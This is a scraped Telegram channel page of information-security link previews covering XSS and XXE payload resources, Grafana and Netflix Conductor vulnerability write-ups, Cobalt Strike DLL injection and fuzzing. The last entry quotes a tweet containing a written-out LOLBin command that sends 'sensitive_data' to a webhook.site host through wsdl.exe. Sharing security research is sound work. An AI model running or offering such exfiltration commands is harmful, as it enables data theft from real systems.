Information Security
@sec_nerd_en
414
subscribers
157
photos
5
videos
9
files
2.28K
links
Information Security News
we are
@sec_nerd
twin brother
Download Telegram
Join
Information Security
414 subscribers
Information Security
https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf
Information Security
https://www.secjuice.com/xss-arithmetic-operators-chaining-bypass-sanitization/
Information Security
https://github.com/jaeles-project/jaeles
GitHub
GitHub - jaeles-project/jaeles: The Swiss Army knife for automated Web Application Testing
The Swiss Army knife for automated Web Application Testing - jaeles-project/jaeles
Information Security
https://swarm.ptsecurity.com/grafana-6-4-3-arbitrary-file-read/
PT SWARM
Grafana 6.4.3 Arbitrary File Read
An article about an Arbitrary File Read vulnerability (CVE-2019-19499) in Grafana
Information Security
https://medium.com/@bamalkaranbamal/how-to-spot-and-exploit-postmessage-vulnerablities-329079d307cc
Medium
How to spot and exploit postMessage vulnerablities?
Here is a primer on finding and creating POCs for bugs found with postMessage javascript function
Information Security
https://www.hackerone.com/blog/Top-Firewall-Misconfigurations-that-Lead-to-Easy-Exploitations
HackerOne
Top Firewall Misconfigurations that Lead to Easy Exploitations by Attackers
Network security should be a major focus for companies moving to the cloud. Cloud networks are exposed to the Internet and companies don’t have direct control of the hardware running them. When not configured correctly, networks in the cloud could be attacked…
Information Security
https://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md
GitHub
dtd-finder/list/xxe_payloads.md at 698fd678f26395e1c7c097525f7182aecad0cd5f · GoSecure/dtd-finder
List DTDs and generate XXE payloads using those local DTDs. - GoSecure/dtd-finder
Information Security
https://twitter.com/juwilie1337/status/1301099882304942086
Twitter
juwilie
If you want your own Burp Collaborator, but with more protocols and web panel here it is https://t.co/jUZj6VWAy7
Information Security
https://lab.wallarm.com/340-weak-jwt-secrets-you-should-check-in-your-code/
Wallarm
☝️
340 weak JWT secrets you should check in your code
340 weak JWT secrets you should check in your code. Don't leave your web app's authentication exposed to hackers. Review this list
Information Security
https://prookl.dev/uncategorized/writing-a-burp-extension/
Prookl
Writing A Burp Extension, Prookl
I recently took a Black Hat course by MDSec called
Information Security
https://github.com/summitt/Burp-Non-HTTP-Extension
GitHub
GitHub - summitt/Nope-Proxy: TCP/UDP Non-HTTP Proxy Extension (NoPE) for Burp Suite.
TCP/UDP Non-HTTP Proxy Extension (NoPE) for Burp Suite. - summitt/Nope-Proxy
Information Security
https://securitylab.github.com/advisories/GHSL-2020-027-netflix-conductor
GitHub Security Lab
GHSL-2020-027: Server-Side Template Injection in Netflix Conductor
A Server-Side Template Injection was identified in Netflix Conductor enabling attackers to inject arbitrary Java EL expressions, leading to a pre-auth Remote Code Execution (RCE) vulnerability.
Information Security
https://x64sec.sh/custom-dll-injection-with-cobalt-strike/
Information Security
https://github.com/Nalen98/AngryGhidra
GitHub
GitHub - Nalen98/AngryGhidra: Use angr in Ghidra
Use angr in Ghidra. Contribute to Nalen98/AngryGhidra development by creating an account on GitHub.
Information Security
https://hardik05.wordpress.com/2020/09/05/fuzzing-with-hongfuzz-fuzzing-a-simple-c-program/
Hardik05's Blog
[Fuzzing with hongfuzz] Fuzzing a simple C program
Video post by @hardik05.
Information Security
https://github.com/b1ack0wl/linux_mint_poc
GitHub
GitHub - b1ack0wl/linux_mint_poc
Contribute to b1ack0wl/linux_mint_poc development by creating an account on GitHub.
Information Security
https://github.com/rdoix/Buffer-Overflow-Cheat-Sheet
GitHub
GitHub - rdoix/Buffer-Overflow-Cheat-Sheet
Contribute to rdoix/Buffer-Overflow-Cheat-Sheet development by creating an account on GitHub.
Information Security
https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/
research.securitum.com
Prototype pollution - and bypassing client-side HTML sanitizers - research.securitum.com
In this article I’ll cover the prototype pollution vulnerability and show it can be used to bypass client-side HTML sanitizers. I’m also considering various ways to find exploitation of prototype pollution via semi-automatic methods. It could also be a big…
Information Security
https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html?m=1
Blogspot
Attacking the Qualcomm Adreno GPU
Posted by Ben Hawkes, Project Zero When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a...
Information Security
https://twitter.com/NtSetDefault/status/1303643299509567488
Twitter
NtRaiseException()
Another way to use #LOLBins for data exfiltration "C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\wsdl.exe" /server https[:]//webhook.site/xxxxx-xxxx-xxxxxx?sensitive_data
🚧
UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol…
